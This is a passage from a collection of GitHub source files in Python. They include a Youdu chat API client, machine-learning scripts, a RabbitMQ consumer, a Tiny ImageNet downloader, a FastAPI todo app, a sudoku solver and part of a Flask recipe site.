e)\n\n\ndef _parse_err(resp_json):\n\n \"\"\"\n 解析错误json信息,如果有错误直接抛出异常\n :param resp_json: 接口返回的json信息\n :except ParamParserError: resp_json不为dict抛出异常\n :except HttpRequestError: 错误码不为0则抛出异常\n \"\"\"\n if not isinstance(resp_json, dict):\n raise ParamParserError('response json is empty')\n\n err_code = resp_json.get('errcode')\n if not isinstance(err_code, int):\n raise ParamParserError('errcode not match type int')\n\n if err_code != 0:\n err_msg = resp_json.get('errmsg', 'no error message')\n raise HttpRequestError(err_code, pystr(err_msg))\n\n\ndef _get_token(buin, app_id, url, crypto_obj):\n \"\"\"\n 获取accessToken\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 请求url\n :param crypto_obj: 加密对象\n :return: (token: accessToken, expire_in: 留存时间,单位:秒)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :rtype: (str, int)\n \"\"\"\n cipher_text = crypto_obj.encrypt(bytestr(str(int(time.time()))))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_text}\n json_result = dict()\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n json_result = rsp.json()\n _parse_err(json_result)\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n\n encrypt_string = json_result.get('encrypt')\n if not is_instance(encrypt_string, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n try:\n token_info = json_loads_utf8(pystr(crypto_obj.decrypt(encrypt_string)))\n token = token_info.get('accessToken')\n expire_in = token_info.get('expireIn')\n if not is_instance(token, unicode_str(), str) and not isinstance(expire_in, int):\n raise ParamParserError('accessToken or expireIn not exists')\n\n return pystr(token), expire_in\n except ValueError as e:\n raise ParamParserError('parse json failed ', e)\n\n\ndef _send_msg(buin, app_id, url, crypto_obj, msg):\n \"\"\"\n 发送消息\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param msg: Message消息对象\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type msg: Message\n \"\"\"\n cipher_text = crypto_obj.encrypt(bytestr(msg.to_json_string()))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_text}\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n _parse_err(rsp.json())\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n\n\ndef _upload_file(buin, app_id, url, crypto_obj, file_type, file_name, file_path):\n \"\"\"\n 上传文件\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param file_type: 文件类型\n :param file_name: 文件名称\n :param file_path: 文件路径\n :return: 资源Id\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 读文件错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type file_type: str\n :type file_name: str\n :type file_path: str\n :rtype: str\n \"\"\"\n cipher_request = crypto_obj.encrypt(bytestr(json.dumps({'type': file_type, 'name': file_name})))\n encrypt_file = ''\n try:\n with open(file_path, 'rb') as f:\n encrypt_file = crypto_obj.encrypt(f.read())\n except IOError as e:\n raise FileIOError('failed to read from file {path}'.format(path=file_path), e)\n\n encoder = MultipartEncoder(\n fields={'buin': str(buin),\n 'appId': app_id,\n 'encrypt': cipher_request,\n 'file': ('file', encrypt_file, 'text/plain')}\n )\n\n try:\n rsp = requests.post(url, data=encoder, headers={'Content-Type': encoder.content_type})\n _parse_status(rsp)\n json_result = rsp.json()\n _parse_err(json_result)\n cipher_id = json_result.get('encrypt')\n if not is_instance(cipher_id, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n media_id = json_loads_utf8(pystr(crypto_obj.decrypt(cipher_id))).get('mediaId', '')\n if not is_instance(media_id, unicode_str(), str):\n raise ParamParserError('result invalid')\n\n return pystr(media_id)\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n\n\ndef _download_file(buin, app_id, url, crypto_obj, media_id, out_dir):\n \"\"\"\n 下载文件\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param media_id: 资源Id\n :param out_dir: 输出文件的目录\n :return: (name: 文件名称, size: 文件大小,单位:字节, content: 文件内容)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 写文件错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type media_id: str\n :type out_dir: str\n :rtype: (str, int, bytes)\n \"\"\"\n cipher_id = crypto_obj.encrypt(bytestr(json.dumps({'mediaId': media_id})))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_id}\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n json_result = None\n try:\n json_result = rsp.json()\n except ValueError:\n pass # 成功的时候不存在JSON数据\n if json_result is None:\n json_result = {'errcode': 0, 'errmsg': ''}\n _parse_err(json_result)\n cipher_info = rsp.headers.get('encrypt')\n if not is_instance(cipher_info, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n file_info = json_loads_utf8(pystr(crypto_obj.decrypt(cipher_info)))\n file_name = file_info.get('name')\n file_size = file_info.get('size')\n if not is_instance(file_name, unicode_str(), str) and isinstance(file_size, int):\n raise ParamParserError('name or size not exists')\n\n file_content = bytestr('')\n with open(abspath(join(out_dir, pystr(file_name))), 'wb') as f:\n file_content = crypto_obj.decrypt(pystr(rsp.content))\n f.write(file_content)\n\n return pystr(file_name), file_size, file_content\n\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n except IOError as e:\n raise FileIOError('failed to save file to {path}'.format(path=out_dir), e)\n\n\ndef _search_file(buin, app_id, url, crypto_obj, media_id):\n \"\"\"\n 搜索文件信息\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param media_id: 资源Id\n :return: (文件名, 字节数大小)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type media_id: str\n :rtype: (str, int)\n \"\"\"\n cipher_id = crypto_obj.encrypt(bytestr(json.dumps({'mediaId': media_id})))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_id}\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n json_result = rsp.json()\n _parse_err(json_result)\n encrypt_result = json_result.get('encrypt')\n if not is_instance(encrypt_result, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n file_info = json_loads_utf8(pystr(crypto_obj.decrypt(encrypt_result)))\n name = file_info.get('name', '')\n size = file_info.get('size', 0)\n if name == '' or size <= 0:\n raise ParamParserError('file info is not valid')\n\n return name, size\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n","repo_name":"treerootboy/YouduChatGpt","sub_path":"entapp/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":15181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"29711903890","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('Sample_Data2.csv')\r\n\r\nfor column in data.columns:\r\n data[column] = (data[column] - data[column].min()) / (data[column].max() - data[column].min())\r\n\r\n\r\nx = data.iloc[:, 0:2]\r\nones = np.ones((x.shape[0], 1))\r\nx = np.concatenate((ones, x), axis=1)\r\n\r\ny = data.iloc[:, 2:3].values\r\n\r\nweights = np.zeros([1, 3])\r\n\r\nlr = 0.01\r\niters = 1000\r\n\r\n\r\n\r\ndef findloss(x, y, weights):\r\n loss_num = np.power(((x @ weights.T) - y), 2)\r\n return np.sum(loss_num) / (2 * len(x))\r\n\r\n\r\ndef desent(x, y, weights, iters, lr):\r\n loss = np.zeros(iters)\r\n for i in range(iters):\r\n loss[i] = findloss(x, y, weights)\r\n weights = weights - (lr / (len(x))) * np.sum(x * (x @ weights.T - y), axis=0)\r\n\r\n return weights, loss\r\n\r\n\r\nf_weights, loss = desent(x, y, weights, iters, lr)\r\n\r\n\r\nf_loss = findloss(x, y, f_weights)\r\n#print(f_loss)\r\n\r\nk = f_weights.size\r\n\r\ndef create_x_list(k):\r\n for i in range(k):\r\n power = x ** i\r\n return power\r\n\r\n","repo_name":"ThilakBS/AIDEEP","sub_path":"3rdAssingment.py","file_name":"3rdAssingment.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73747495504","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 31 18:20:00 2017\n\n@author: Alex\n\"\"\"\nimport sys\nimport os\n\nsys.path.append(os.path.join(__file__, os.pardir))\n\nimport pickle\nimport ast\nimport os\nimport qca.flightsched as flight\nimport qca.qcarun as qcarun\nimport pandas\nimport numpy\nimport math\nyear = '2007'\nmonth = '02'\nday = '04'\nresults_folder = os.path.abspath(os.path.join(os.path.join(os.path.join(__file__, os.pardir), os.pardir), 'results'))\nb_vals = [0.0625, 0.125, 0.25, 0.5, 1.0, 2.0]\nlog_bvals = [-4, -3, -2, -1, 0, 1]\nprofile = tuple([22]*4*24)\nfiles = ['results_b' + str(b) + '.out' for b in b_vals]\nseries = {'original', 'uncont', 'cont', 'fixed', 'nomono'}\ntotal_value = {s:[] for s in series}\nsocial_value = {s:[] for s in series}\nnet_value = {s:[] for s in series}\nnum_flights = {s:[] for s in series}\nagg=\"MedAgg\"\nfor f in files:\n with open(os.path.join(os.path.join(results_folder, agg+'_UncontMono_VaryBeta_AllSubs2007_02_04'), f),\n 'rb') as my_file:\n my_results: qcarun.AuctionResultStruct = pickle.load(my_file)\n\n origvalue = (\n sum(qcarun.get_schedule_value_without_monopoly(my_results.params.flights, my_results.params).values()))\n total_value['original'].append(origvalue)\n social_value['original'].append(origvalue)\n net_value['original'].append(origvalue)\n num_flights['original'].append(len(my_results.params.flights))\n\n nomonovalue = (sum(\n qcarun.get_schedule_value_without_monopoly(my_results.best_schedule.schedule, my_results.params).values()))\n monovalue = (sum(qcarun.get_schedule_monopoly_value(my_results.best_schedule.schedule, my_results.best_profile,\n my_results.params).values()))\n payments = sum(my_results.payments.values())\n total_value['uncont'].append(nomonovalue+monovalue)\n social_value['uncont'].append(nomonovalue)\n net_value['uncont'].append(nomonovalue+monovalue - payments)\n num_flights['uncont'].append(len(my_results.best_schedule.schedule))\n\n fixedprof_results = qcarun.get_fixed_prof_payments(results=my_results, profile=profile)\n total_value['fixed'].append(fixedprof_results.social_value+fixedprof_results.mono_value)\n social_value['fixed'].append(fixedprof_results.social_value)\n net_value['fixed'].append(fixedprof_results.social_value+fixedprof_results.mono_value- fixedprof_results.payment)\n num_flights['fixed'].append(len(my_results.subaction_results[profile, None].schedule))\n with open(os.path.join(os.path.join(results_folder, agg+'_ContMono_VaryBeta_AllSubs2007_02_04'), f),\n 'rb') as my_file:\n my_results: qcarun.AuctionResultStruct = pickle.load(my_file)\n nomonovalue = (sum(\n qcarun.get_schedule_value_without_monopoly(my_results.best_schedule.schedule, my_results.params).values()))\n monovalue = (sum(qcarun.get_schedule_monopoly_value(my_results.best_schedule.schedule, my_results.best_profile,\n my_results.params).values()))\n payments = sum(my_results.payments.values())\n total_value['cont'].append(nomonovalue + monovalue)\n social_value['cont'].append(nomonovalue)\n net_value['cont'].append(nomonovalue+monovalue - payments)\n num_flights['cont'].append(len(my_results.best_schedule.schedule))\n with open(os.path.join(os.path.join(results_folder, agg+'_NoMono_VaryBeta_AllSubs2007_02_04'), f),\n 'rb') as my_file:\n my_results: qcarun.AuctionResultStruct = pickle.load(my_file)\n nomonovalue = (sum(\n qcarun.get_schedule_value_without_monopoly(my_results.best_schedule.schedule, my_results.params).values()))\n monovalue = (sum(qcarun.get_schedule_monopoly_value(my_results.best_schedule.schedule, my_results.best_profile,\n my_results.params).values()))\n payments = sum(my_results.payments.values())\n total_value['nomono'].append(nomonovalue + monovalue)\n social_value['nomono'].append(nomonovalue)\n net_value['nomono'].append(nomonovalue+monovalue - payments)\n num_flights['nomono'].append(len(my_results.best_schedule.schedule))\nfor myresults, name in zip([total_value, social_value, net_value, num_flights], ['total', 'social', 'net', 'flights']):\n for s, values in myresults.items():\n print(name, s)\n for b,v in zip(log_bvals,values):\n print((b,v))\n print(name+\"_difference\", s)\n for b, v, o_v in zip(log_bvals, values, myresults['original']):\n print((b, v-o_v))\n\n # print(my_results.params)\n","repo_name":"asestes1/qca-ip-sim","sub_path":"test/read_result_values.py","file_name":"read_result_values.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12058157586","text":"from modules.blocks.ReshapeLayer import ReshapeLayer\nfrom modules.normalization.AdaptiveInstanceNormalization import AdaptiveInstanceNormalization\nfrom modules.blocks.ResidualBlock import ResidualBlock\nfrom modules.blocks.DenseBlock import DenseBlock\nfrom modules.blocks.ConvolutionalBlock import ConvolutionalBlock, UpscaleBlock\nfrom modules.blocks.AttentionBlock import AttentionBlock\nfrom modules.blocks.NoiseInput import NoiseInput\n\nimport unittest\nfrom modules.generative.Generator import Generator\nimport torch.nn as nn\nimport torch\n\nclass TestGenerator(unittest.TestCase):\n def setUp(self):\n self.pathgan_generator = Generator()\n self.generator_blocks = self.pathgan_generator.named_children()\n\n self.pathgan_blocks = [\n (\"dense_block_0\", DenseBlock),\n (\"dense_block_1\", DenseBlock),\n (\"reshape_block\", ReshapeLayer),\n (\"res_block_0\", ResidualBlock),\n (\"upscale_block_0\", UpscaleBlock),\n (\"res_block_1\", ResidualBlock),\n (\"upscale_block_1\", UpscaleBlock), \n (\"res_block_2\", ResidualBlock),\n (\"attention_block_2\", AttentionBlock),\n (\"upscale_block_2\", UpscaleBlock), \n (\"res_block_3\", ResidualBlock),\n (\"upscale_block_3\", UpscaleBlock),\n (\"res_block_4\", ResidualBlock),\n (\"upscale_block_4\", UpscaleBlock), \n (\"sigmoid_block\", ConvolutionalBlock)\n ]\n \n self.pathgan_channels = dict({\n \"dense_block_0\" : (200,1024),\n \"dense_block_1\" : (1024,12544),\n \"reshape_block\" : (12544, 256),\n\n \"res_block_0\" : (256,256),\n \"upscale_block_0\" : (256,512),\n \n \"res_block_1\" : (512,512),\n \"upscale_block_1\" : (512,256),\n \n \"res_block_2\" : (256,256),\n \"attention_block_2\" : (256,256),\n \"upscale_block_2\" : (256,128),\n \n \"res_block_3\" : (128,128),\n \"upscale_block_3\" : (128,64),\n \n \"res_block_4\" : (64,64),\n \"upscale_block_4\" : (64,32),\n \n \"sigmoid_block\" : (32,3),\n })\n \n def test_that_number_of_blocks_is_correct(self):\n self.assertEqual(sum(1 for _ in self.generator_blocks), len(self.pathgan_blocks),\n \"Number of blocks should match configuration\")\n \n def test_that_block_order_is_correct(self):\n for generator_block, correct_block in zip(self.generator_blocks, self.pathgan_blocks):\n generator_block_type = type(generator_block[1])\n correct_block_type = correct_block[1]\n self.assertIs(generator_block_type, correct_block_type,\n f\"Type and order of generator blocks should match configuration ({generator_block[0]})\")\n \n def test_that_block_names_are_correct(self):\n for generator_block, correct_block in zip(self.generator_blocks, self.pathgan_blocks):\n generator_block_name = generator_block[0]\n correct_block_name = correct_block[0]\n self.assertEqual(generator_block_name, correct_block_name, \n f\"Name of generator blocks should match configuration ({generator_block_name})\")\n \n def test_that_blocks_have_correct_activations(self):\n for block in self.pathgan_generator.named_children():\n if type(block[1]) in (DenseBlock, ConvolutionalBlock) and block[0] != 'sigmoid_block':\n self.assertIs(type(block[1].activation), nn.LeakyReLU)\n \n def test_that_blocks_have_adaptive_instance_normalization(self):\n for block in self.pathgan_generator.children():\n if type(block) in (DenseBlock, UpscaleBlock):\n self.assertTrue(hasattr(block, 'normalization'),\n f\"Dense and convolution blocks should have normalization ({block})\")\n self.assertIs(type(block.normalization), AdaptiveInstanceNormalization,\n f\"Normalization should be AdaIN ({block})\")\n \n if type(block) is ResidualBlock:\n for res_block in block.children():\n self.assertIs(type(res_block.normalization), AdaptiveInstanceNormalization, \n f\"Normalization should be AdaIN ({res_block})\")\n \n def test_that_blocks_have_correct_in_and_out_channels(self):\n for name, block in self.pathgan_generator.named_children():\n block_channels = (block.in_channels, block.out_channels)\n self.assertEqual(block_channels, self.pathgan_channels[name],\n \"Blocks should have correct in_ and out_channels\")\n \n def test_checks_for_valid_output_image_size(self):\n with self.assertRaises(ValueError):\n Generator(synthesis_out_channels = [512, 256, 128, 64, 32], output_shape = (223, 223, 3))\n \n def test_output_shape_is_correct_vanilla_case(self):\n generator = Generator(normalization=None, noise_input=None)\n data = torch.rand((10, 200))\n latent_in = torch.rand((10, 200))\n output = generator(data, latent_in)\n self.assertEqual(output.shape, (10, 3, 224, 224))\n \n def test_output_shape_is_correct_with_adain(self):\n generator = Generator(normalization=AdaptiveInstanceNormalization, noise_input=None)\n data = torch.rand((10, 200))\n latent_in = torch.rand((10, 200))\n output = generator(data, latent_in)\n self.assertEqual(output.shape, (10, 3, 224, 224))\n \n def test_output_shape_is_correct_with_noise_input(self):\n generator = Generator(normalization=None, noise_input=NoiseInput)\n data = torch.rand((10, 200))\n latent_in = torch.rand((10, 200))\n output = generator(data, latent_in)\n self.assertEqual(output.shape, (10, 3, 224, 224)) ","repo_name":"theodore-evans/pathgan-pytorch","sub_path":"tests/testGenerator.py","file_name":"testGenerator.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42563712534","text":"\n# Check if list contains all of the following elements: 4,8,12,16\n# Create a function that accepts list_of_numbers as an input\n# it should return \"True\" if it contains all, otherwise \"False\"\n\nlist_of_numbers = [2, 4, 6, 8, 10, 12, 14, 16]\n\ndef Checker(NumList = []):\n if (4 in NumList) and (8 in NumList) and (12 in NumList) and (16 in NumList):\n return True\n else:\n return False\n\nprint(Checker(list_of_numbers))","repo_name":"green-fox-academy/DonBattery","sub_path":"week-02/day-3/is_in_list.py","file_name":"is_in_list.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43001639074","text":"import pika\n\n# 链接到rabbitmq服务器器\ncredentials = pika.PlainCredentials('guest', 'guest')\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost', 5672, '/', credentials))\n\n# 创建频道,��明消息队列列\nchannel = connection.channel()\n\n# 和⽣生产者声明同⼀一个队列列,如果一⽅挂掉,不会丢失数据\nchannel.queue_declare(queue='desk')\n\n\n# 定义接受消息的回调函数\ndef callback(channel, method, properties, body):\n print(body)\n\n\n# 告诉RabbitMQ使⽤用callback来接收信息\nchannel.basic_consume(on_message_callback=callback, queue='desk', auto_ack=True)\n\n# 开始接收信息\nchannel.start_consuming()\n","repo_name":"mossrs/zjsl","sub_path":"backend/utils/test_rabbitmq/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30753668341","text":"\"\"\"\nTiny ImageNet 200 dataset.\nCode adapted from\n\"1-Lipschitz Layers Compared: Memory, Speed, and Certifiable Robustness\", 2023.\n\"\"\"\n\nimport os\n\nfrom torchvision.datasets import ImageFolder\n\nDATASET_URL = \"http://cs231n.stanford.edu/tiny-imagenet-200.zip\"\nDATASET_FILENAME = \"tiny-imagenet-200\"\nDATASET_ZIP_FILENAME = \"tiny-imagenet-200.zip\"\nVAL_ANNOTATION_FILENAME = \"val_annotations.txt\"\n\n\nclass TinyImageNet(ImageFolder):\n def __init__(self,\n root: str,\n *args,\n train: bool = True,\n download: bool = True,\n **kwargs\n ):\n\n if download:\n download_and_prepare_tiny_image_net(root)\n\n subfolder = \"train\" if train else \"val\"\n image_folder = os.path.join(root, DATASET_FILENAME, subfolder)\n super().__init__(image_folder, *args, **kwargs)\n\n\ndef download_and_prepare_tiny_image_net(root):\n zip_filename = os.path.join(root, DATASET_ZIP_FILENAME)\n if os.path.exists(zip_filename):\n return\n\n print(\"Downloading Tiny ImageNet 200 dataset...\")\n old_cwd = os.getcwd()\n os.chdir(root)\n os.system(f\"wget -nc {DATASET_URL}\")\n\n print(\"Unzipping Tiny ImageNet 200 dataset...\")\n os.system(f\"unzip -n {DATASET_ZIP_FILENAME}\")\n\n print(\"Moving validation images to sub-folders...\")\n val_dir = os.path.join(DATASET_FILENAME, \"val\")\n val_annotation_filename = os.path.join(val_dir, VAL_ANNOTATION_FILENAME)\n with open(val_annotation_filename) as f:\n for line in f:\n fields = line.split()\n img_filename = fields[0]\n label = fields[1]\n label_dir = os.path.join(val_dir, label)\n os.makedirs(label_dir, exist_ok=True)\n # move image to sub-folder\n os.rename(\n os.path.join(val_dir, \"images\", img_filename),\n os.path.join(label_dir, img_filename),\n )\n\n # Remove empty image folder:\n os.rmdir(os.path.join(val_dir, \"images\"))\n\n print(\"Done.\")\n os.chdir(old_cwd)\n","repo_name":"berndprach/NActivation","sub_path":"src/datasets/tiny_image_net.py","file_name":"tiny_image_net.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28984366575","text":"from fastapi import FastAPI\nfrom .dataBase.DataBase import engine\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom .routers import authRouter,todoRouter,userRouter\nfrom .models import model\napp = FastAPI()\n\n\n#this is used to create the models defined in python to the database when we r not using alembic\n#alembic can create database by using alembic revision --autogenerate\nmodel.Base.metadata.create_all(bind=engine)\n\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n@app.get('/')\ndef root():\n msg = 'Welcome to the ToDo api made with <3 by nitish'\n return msg\n\napp.include_router(authRouter.router)\napp.include_router(userRouter.router)\napp.include_router(todoRouter.router)\n\n\n","repo_name":"nitish12rm/todo_RestAPI","sub_path":"apps/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42486592926","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 14:29:41 2019\n\n@author: siddharth.m98@gmail.com\n\"\"\"\n# An Machine learning model that can help HR team by detecting the bluff of an candidate regarding the negotiation salary wrt the years of experience.\n\n# First we need to import 3 libraries for this. These are numpy,matplotlib(if you want to visualize) and pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('../input/Salary_Data.csv')\nX = dataset.iloc[:, 0:1].values # We use this python function to get the 1st coloumn alone as it is X\ny = dataset.iloc[:, 1].values # We use this to get the 2nd coloumn alone which is the one we want to predict Y\n\n# Be any regression model, we need to use linear regression to fit out data into the model so we must import LinearRegression from the sklearn.linear_model class\nfrom sklearn.linear_model import LinearRegression \nlin_reg = LinearRegression()\nlin_reg.fit(X,y)\n\n#Till now we can use this model for making a linear prediction. BUt since we want super accuracy, we must use polynomial prediction. where we have to give powers multiplication in linear manner. \n#So we use our PolynomialFeatures from sklearn.preprocessing class for this. Later we transform the current X data to polynomial data using lin_reg.\n\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree = 5) # we use the degree as 5 here for best prediction.\nX_poly = poly_reg.fit_transform(X)\n\n#We perform fitting of our polynomial data here using lin_reg2.\nlin_reg2 = LinearRegression()\nlin_reg2.fit(X_poly,y)\n\n#We can use matplotlib for using plt.scatter to get the visual data.\n\nplt.scatter(X,y,color = 'red')\nplt.plot(X,lin_reg.predict(X),color = 'blue')\nplt.title('truth or bluff - linear reg')\nplt.xlabel('Experience level')\nplt.ylabel('salary')\nplt.show()\n\n\n\nplt.scatter(X,y,color = 'red')\nplt.plot(X,lin_reg2.predict(poly_reg.fit_transform(X)),color = 'blue')\nplt.title('truth or bluff - linear reg')\nplt.xlabel('Experience level')\nplt.ylabel('salary')\nplt.show()\n\n# Now we can predict any salary by passing years of experience as parameter.\n\nlin_reg2.predict(poly_reg.fit_transform([[6.5]]))\n","repo_name":"Siddharth1698/Bluff-Detector-using-Polynimial-Regression","sub_path":"bluff_model.py","file_name":"bluff_model.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29793967720","text":"# Copyright (C) 2010 velociraptor Genjix \r\n# Copyright (C) 2022 The Qt Company Ltd.\r\n# SPDX-License-Identifier: LicenseRef-Qt-Commercial OR BSD-3-Clause\r\n\r\nimport sys\r\n\r\nfrom PySide6.QtWidgets import QApplication, QPushButton\r\nfrom PySide6.QtStateMachine import QState, QStateMachine\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n button = QPushButton()\r\n machine = QStateMachine()\r\n\r\n closed = QState()\r\n closed.assignProperty(button, 'text', 'Closed')\r\n closed.setObjectName('closed')\r\n\r\n open = QState()\r\n open.setObjectName('Open')\r\n open.assignProperty(button, 'text', 'Open')\r\n\r\n closed.addTransition(button.clicked, open)\r\n open.addTransition(button.clicked, closed)\r\n\r\n machine.addState(closed)\r\n machine.addState(open)\r\n machine.setInitialState(closed)\r\n machine.start()\r\n button.resize(100, 50)\r\n button.show()\r\n sys.exit(app.exec())","repo_name":"nickfreeborn/rocketry_gui","sub_path":"toggle_test.py","file_name":"toggle_test.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18310957524","text":"class Solution:\n\n def getColValues(self, board, col):\n s = set([board[row][col]\n for row in range(9) if board[row][col] != '.'])\n return s\n\n def getBoxValues(self, board, row, col):\n rbox = 3 * (row // 3)\n cbox = 3 * (col // 3)\n s = set()\n for r in range(rbox, rbox + 3):\n for c in range(cbox, cbox + 3):\n if board[r][c] != '.':\n s.add(board[r][c])\n return s\n\n def solveSudoku(self, board: List[List[str]]) -> None:\n possible_values_set = set([str(i) for i in range(1, 10)])\n self.solveSudokuBT(board, possible_values_set)\n\n def solveSudokuBT(self, board: List[List[str]], possible_values_set: set) -> None:\n for row in range(9):\n rowValues = set(board[row])\n rowValues.discard('.')\n for col in range(9):\n if board[row][col] == '.':\n possibleVals = possible_values_set - rowValues - \\\n self.getColValues(board, col) - \\\n self.getBoxValues(board, row, col)\n if not possibleVals:\n return False\n\n for val in possibleVals:\n board[row][col] = val\n is_valid = self.solveSudokuBT(\n board, possible_values_set)\n if is_valid:\n return True\n board[row][col] = '.'\n return False # nothing is valid\n return True\n","repo_name":"AEstLo/LeetCode","sub_path":"0037_Sudoku_Solver.py","file_name":"0037_Sudoku_Solver.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12461894162","text":"from flask import render_template, flash, redirect, url_for, request, session, send_from_directory, Markup\nfrom app import login, app, db, avatars\nfrom app.forms import ConfirmationRequestForm, LoginForm, RegistrationForm, EditProfileForm, EmptyForm, RecipeForm, ResetPasswordRequestForm, ResetPasswordForm, CropAvatarForm, UploadAvatarForm, CommentForm\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom app.models import User, Recipe, Comment, Notification, Vote, RecipeLike\nfrom werkzeug.urls import url_parse\nfrom werkzeug.utils import secure_filename\nfrom datetime import datetime, timedelta\nfrom email_tools import send_password_reset_email, send_confirmation_email\nfrom sqlalchemy import and_, or_, func, case\nimport os, timeago, sys\nfrom random import randint\nfrom PIL import Image\n\n@login.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n@app.template_filter('timeago')\ndef fromnow(date):\n return timeago.format(date, datetime.utcnow())\n\n@app.route('/favicon.ico')\ndef favicon():\n return send_from_directory(os.path.join(app.root_path, 'static'),'favicon.ico', mimetype='image/vnd.microsoft.icon')\n\n@app.route('/recipe//', methods=['GET', 'POST'])\ndef recipe(recipe_name, recipe_id):\n form = CommentForm()\n recipe = Recipe.query.filter_by(id=recipe_id, approved=True).first_or_404()\n page = request.args.get('page', 1, type=int)\n comments = Comment.query.filter_by(recipe_id=recipe.id).order_by(Comment.timestamp.asc()).paginate(\n page, app.config['COMMENTS_PER_PAGE'], False)\n if form.validate_on_submit():\n comment = Comment(content=form.content.data, author=current_user, recipe_id=recipe.id)\n db.session.add(comment)\n db.session.commit()\n flash('Your comment has been published.', 'alert-success')\n last_page = len(comments.items)\n return redirect(url_for('recipe', page=last_page, recipe_name=recipe.urlify(), recipe_id=recipe.id, _anchor='comments'))\n return render_template('recipe.html', recipe_name=recipe_name, recipe_id=recipe_id, form=form, title=recipe.name, recipe=recipe, user=recipe.author, comments=comments, clean_desc=Markup(recipe.description.replace(' ', ' 